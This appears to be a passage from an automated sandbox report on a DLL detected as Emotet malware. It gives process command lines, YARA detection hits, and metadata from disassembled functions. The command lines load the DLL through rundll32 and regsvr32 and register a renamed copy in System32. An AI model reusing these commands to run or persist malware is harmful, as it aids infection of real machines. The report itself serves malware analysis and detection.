Imagebase:	0x7ff7a1e30000
File size:	140288 bytes
MD5 hash:	4E8A40CAD6CCC047914E3A7830A2D8AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	1
Start time:	05:05:26
Start date:	14/05/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
Imagebase:	0x7ff6a6590000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	05:05:27
Start date:	14/05/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\auExrOTnvB.dll
Imagebase:	0x7ff721ed0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.367002552.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	05:05:27
Start date:	14/05/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\Desktop\auExrOTnvB.dll",#1
Imagebase:	0x7ff63e280000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.365205750.000002135E670000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.363901894.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	05:05:27
Start date:	14/05/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllRegisterServer
Imagebase:	0x7ff63e280000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.365208101.00000237001B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.364590650.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	05:05:31
Start date:	14/05/2022
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe C:\Users\user\Desktop\auExrOTnvB.dll,DllUnregisterServer
Imagebase:	0x7ff63e280000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	05:05:31
Start date:	14/05/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlUoNfxsJl\nlEiWRnuQfGg.dll"
Imagebase:	0x7ff721ed0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.875184317.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.876067804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	11
Start time:	05:05:58
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	12
Start time:	05:06:07
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	14
Start time:	05:06:13
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	18
Start time:	05:06:34
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	20
Start time:	05:06:45
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	24
Start time:	05:07:07
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	28
Start time:	05:07:54
Start date:	14/05/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Imagebase:	0x7ff7e8070000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	16.2%
Total number of Nodes:	684
Total number of Limit Nodes:	6

Executed Functions

Function 00570000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00570450
GetNativeSystemInfo.KERNELBASE ref: 00570539
VirtualAlloc.KERNELBASE ref: 00570580
VirtualProtect.KERNELBASE ref: 005709E9
RtlAddFunctionTable.KERNEL32 ref: 00570A79

Strings

Reso, xrefs: 00570355
Reso, xrefs: 005702DB
Size, xrefs: 00570311
Virt, xrefs: 005700E0
Virt, xrefs: 005700F8
lloc, xrefs: 005700F0
Load, xrefs: 005700C8
aryA, xrefs: 005700D8
ddFu, xrefs: 00570163
Free, xrefs: 0057034D
Reso, xrefs: 00570338
urce, xrefs: 00570304
ncti, xrefs: 0057016A
urce, xrefs: 005702E7
Reso, xrefs: 005702FC
Flus, xrefs: 00570113
Libr, xrefs: 005700D0
Load, xrefs: 005702F4
eSys, xrefs: 00570144
RtlA, xrefs: 0057015C
ualP, xrefs: 005700FF
ualA, xrefs: 005700E8
tion, xrefs: 00570128
Find, xrefs: 005702D0
onTa, xrefs: 00570171
urce, xrefs: 00570340
GetN, xrefs: 00570136
urce, xrefs: 0057035D
Cach, xrefs: 0057012F
Slee, xrefs: 005700B7
truc, xrefs: 00570121
rote, xrefs: 00570106
ativ, xrefs: 0057013D
Lock, xrefs: 00570330
temI, xrefs: 0057014B
sour, xrefs: 0057031F
hIns, xrefs: 0057011A
ofRe, xrefs: 00570318

Memory Dump Source

Source File: 00000002.00000002.366990445.0000000000570000.00000040.00001000.00020000.00000000.sdmp, Offset: 00570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_570000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
API String ID: 394283112-2517549848
Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction ID: 6fa639c0e9fa009ac563b468a8e51fbb29dee1bfae8140a8a3478c002ca4d3e7
Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
Instruction Fuzzy Hash: B572E630618B48CFDB19DF18D8856B9BBE1FB98305F10962DE88ED7251DB34E942CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l, xrefs: 000000018002C1F5
(I, xrefs: 000000018002C62C
Z, xrefs: 000000018002C36B
l, xrefs: 000000018002C347
<W, xrefs: 000000018002C1D0
#C, xrefs: 000000018002C55D
Ekf, xrefs: 000000018002C0CA
-:, xrefs: 000000018002C100

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #C$(I$-:$Ekf$<W$Z$l$l
API String ID: 0-464535774
Opcode ID: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
Opcode Fuzzy Hash: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007958 Relevance: 9.3, Strings: 7, Instructions: 551
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

J, xrefs: 0000000180007DB2
IS_, xrefs: 0000000180007E52
0n)G, xrefs: 00000001800080D5
oh, xrefs: 0000000180007F5E
9i&, xrefs: 0000000180007F21
c)K, xrefs: 0000000180007D79
oh, xrefs: 0000000180007F68

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
API String ID: 0-4168131144
Opcode ID: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
Opcode Fuzzy Hash: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010FF4 Relevance: 9.1, Strings: 7, Instructions: 363
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)|x, xrefs: 000000018001168C
------------------------------, xrefs: 000000018001103A, 0000000180011814
/Zb, xrefs: 000000018001119F
OV4T, xrefs: 0000000180011307
/v|, xrefs: 00000001800113E2
lA, xrefs: 0000000180011819
\, xrefs: 0000000180011205

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )|x$------------------------------$/Zb$/v|$OV4T$\$lA
API String ID: 0-1281822036
Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)O, xrefs: 000000018002164B
t(/, xrefs: 0000000180021ABB
, xrefs: 00000001800219DA
.pN, xrefs: 0000000180021AE0
&.+, xrefs: 000000018002180B
F>9, xrefs: 0000000180021937

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $&.+$)O$.pN$F>9$t(/
API String ID: 0-3036092626
Opcode ID: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
Opcode Fuzzy Hash: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C20 Relevance: 6.6, Strings: 5, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Q27, xrefs: 0000000180028EC2, 0000000180028E8F, 000000018002907C, 0000000180028DCC, 00000001800290DD, 0000000180028FEB, 0000000180028F82, 0000000180028FD5, 0000000180029047, 0000000180029134, 0000000180028CC6, 0000000180029040, 0000000180028F2F
Mh, xrefs: 0000000180029055
_5, xrefs: 00000001800290F7
:G, xrefs: 0000000180028C4C
yy8x, xrefs: 0000000180028D19

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: :G$Q27$_5$yy8x$Mh
API String ID: 0-3587547327
Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sf, xrefs: 000000018000CE95
w\H, xrefs: 000000018000C959
K', xrefs: 000000018000CAC7
+#;), xrefs: 000000018000CBDA

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +#;)$K'$sf$w\H
API String ID: 0-1051058546
Opcode ID: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
Opcode Fuzzy Hash: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<4P, xrefs: 000000018001E690
<w., xrefs: 000000018001E582
<8, xrefs: 000000018001E63C

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <4P$<8$<w.
API String ID: 0-1030867500
Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013E28 Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

'1O", xrefs: 0000000180013F6E
%'#, xrefs: 0000000180013EFA

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %'#$'1O"
API String ID: 0-3508158491
Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C964 Relevance: 1.5, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

xDC, xrefs: 000000018001CAFA

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: xDC
API String ID: 0-90241050
Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009100 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.367292109.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E3EEC Relevance: 15.1, APIs: 10, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3F1B
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3F35
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3F5B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3FB0
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3FEC
free.LIBCMT ref: 00007FF8CB7E3FFA
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E4005
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E401D
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E405E
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E407A

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
String ID:
API String ID: 994105223-0
Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
Instruction ID: 3ebb7b32daabc6b4e5c8a8a3f178bdaacecbaae8e80b28bf98c7bf3db4118001
Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
Instruction Fuzzy Hash: A5413D31A0DBA68BEA659F13A54403A77A5BF94BD0F154434EE4E07BB4CE3DB8A1C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E2154 Relevance: 10.6, APIs: 7, Instructions: 87
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF8CB7E4110: HeapCreate.KERNELBASE(?,?,?,?,00007FF8CB7E2169), ref: 00007FF8CB7E4122
Part of subcall function 00007FF8CB7E4110: HeapSetInformation.KERNEL32 ref: 00007FF8CB7E414C

_RTC_Initialize.LIBCMT ref: 00007FF8CB7E2184
GetCommandLineA.KERNEL32 ref: 00007FF8CB7E2189

Part of subcall function 00007FF8CB7E3EEC: GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3F1B
Part of subcall function 00007FF8CB7E3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E219B), ref: 00007FF8CB7E3F5B

Part of subcall function 00007FF8CB7E3758: GetStartupInfoA.KERNEL32 ref: 00007FF8CB7E377D

__setargv.LIBCMT ref: 00007FF8CB7E21B2
_cinit.LIBCMT ref: 00007FF8CB7E21C6

Part of subcall function 00007FF8CB7E2C94: FlsFree.KERNEL32(?,?,?,?,00007FF8CB7E2217), ref: 00007FF8CB7E2CA3
Part of subcall function 00007FF8CB7E2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7E2217), ref: 00007FF8CB7E6A32
Part of subcall function 00007FF8CB7E2C94: free.LIBCMT ref: 00007FF8CB7E6A3B
Part of subcall function 00007FF8CB7E2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CB7E2217), ref: 00007FF8CB7E6A5B

Part of subcall function 00007FF8CB7E3A48: free.LIBCMT ref: 00007FF8CB7E3A8F

Part of subcall function 00007FF8CB7E3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

FlsSetValue.KERNEL32 ref: 00007FF8CB7E224C
GetCurrentThreadId.KERNEL32 ref: 00007FF8CB7E2260
free.LIBCMT ref: 00007FF8CB7E226F

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
String ID:
API String ID: 1549890855-0
Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
Instruction ID: 97a7c873f9110e29cd2ebae4b4107dd7ae5f9ec5a11a53998ded3a907a48466a
Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
Instruction Fuzzy Hash: 8A31D230E0CFB78FFA696FA3590227A32995F553D0F114134ED1E896F2EE2CBA504216

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E4CD4 Relevance: 9.1, APIs: 6, Instructions: 122
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_getptd.LIBCMT ref: 00007FF8CB7E4CF3

Part of subcall function 00007FF8CB7E48C0: _getptd.LIBCMT ref: 00007FF8CB7E48CA

Part of subcall function 00007FF8CB7E497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FF8CB7E4D0E,?,?,?,?,?,00007FF8CB7E4EE3), ref: 00007FF8CB7E49A6

Part of subcall function 00007FF8CB7E309C: Sleep.KERNEL32(?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3,?,?,?,?,?,?,00000000,00007FF8CB7E2DC8), ref: 00007FF8CB7E30D2

free.LIBCMT ref: 00007FF8CB7E4D7F

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

_lock.LIBCMT ref: 00007FF8CB7E4DB7
free.LIBCMT ref: 00007FF8CB7E4E67
free.LIBCMT ref: 00007FF8CB7E4E97
